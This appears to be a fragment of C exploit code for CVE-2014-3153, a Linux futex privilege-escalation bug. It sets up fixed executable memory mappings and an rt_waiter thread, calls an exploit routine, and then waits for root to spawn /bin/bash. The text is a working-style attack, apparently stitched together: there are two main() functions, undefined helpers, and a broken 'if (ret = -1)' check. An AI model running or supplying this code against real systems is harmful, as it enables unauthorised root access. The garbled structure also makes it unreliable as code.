int main(int argc, char *argv[])
{
unsigned long mapped_address;
void *waiter_plist;
printf("CVE-2014-3153 exploit by Chen Kaiqu([email protected])\n");
main_pid = gettid();
if(fork() == 0) {
iov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
if (iov_base0 < 0xb0000000) {
printf("mmap failed?\n");
return 1;
}
iov_len0 = 0x10000;
iov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
if (iov_basex < MMAP_ADDR_BASE) {
printf("mmap failed?\n");
return 1;
}
iov_lenx = MMAP_LEN;
waiter_plist = (void *)iov_basex + 0x400;
pthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);
sockfd = server_for_setup_rt_waiter();
if (sockfd < 0) {
printf("Server failed\n");
return 1;
}
if (!do_exploit(waiter_plist)) {
return 1;
}
return 0;
}
while(getuid())
usleep(100);
execl("/bin/bash", "bin/bash", NULL);
return 0;
}
int
main(void)
{
int sockfd;
int ret;
unsigned long mapped_address;
void *waiter_plist;
mapped_address = (unsigned long)mmap((void *)0xa0000000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
if (mapped_address < 0x80000000) {
printf("mmap failed?\n");
return 1;
}
waiter_plist = (void *)mapped_address + 0x800;
ret = server_for_setup_rt_waiter();
if (ret = -1){
return 1;
}
return 0;
}
